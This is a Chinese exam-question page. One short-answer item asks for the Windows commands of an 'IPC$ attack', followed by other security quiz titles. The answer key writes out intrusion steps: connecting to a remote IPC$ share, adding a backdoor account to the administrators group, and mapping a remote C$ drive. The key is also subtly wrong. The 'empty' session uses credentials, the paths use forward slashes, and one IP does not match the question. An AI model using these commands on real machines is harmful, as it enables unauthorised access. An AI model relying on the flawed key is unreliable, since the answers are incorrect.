试题详情
- 简答题 IPC攻击是黑客常用的攻击方式,但需要复杂的连接和操作控制,例如查看目标机的共享情况、建立帐号、留下后面程序等等,请回答ipc攻击的以下步骤操作? 1)建立空ipc$连接的命令。 2)在本机用net user命令建立帐号:s1,并加入administrators组的过程。 3)查看远程主机 192.168.11.222的时间命令 4)映射远程主机192.168.11.6主机上C盘为本机Z:的命令 5)写出删除本机ipc$的命令
-
①、net use //192.168.11.1/ipc$ “password” /user:”admin”
②、net user s1 123 /add
net localgroup administrators s1 /add
③、net time 192.168.11.1
④、net use z://192.168.11.6/c$
⑤、net share ipc$ /del 关注下方微信公众号,在线模考后查看
热门试题
- 将当前目录下hancker.bat文件拷
- 选择下面()的攻击不是拒绝服务攻击。
- 在以下认证方式中,最常用的认证方式是:(
- 密码算法通常有两个相关的函数:一个用做加
- 常见的病毒检测技术有:()、特征代码法、
- 为了降低风险,不建议使用的Interne
- ()攻击方法的一个弱点在于攻击者和主控端
- IDS具备实时监控入侵的能力。
- RC4是由RIVEST在1987年开发的
- 安全审计就是日志的记录。
- ()是网络层上的主要协议,同时被TCP协
- 数据加密技术主要分为()和()。
- 窃听是一种()攻击,攻击者()将自己的系
- 包过滤技术与代理服务技术相比较()。
- 系统的弱点主要有设计上的缺陷、()的缺陷
- 包过滤型防火墙原理上是基于()进行分析的
- 攻击者在网上发布假的路由信息,再通过IC
- DES算法密钥是64位,其中密钥有效位是
- IP劫持不同于用网络侦听来窃取密码的被动
- 防止用户被冒名所欺骗的方法是()。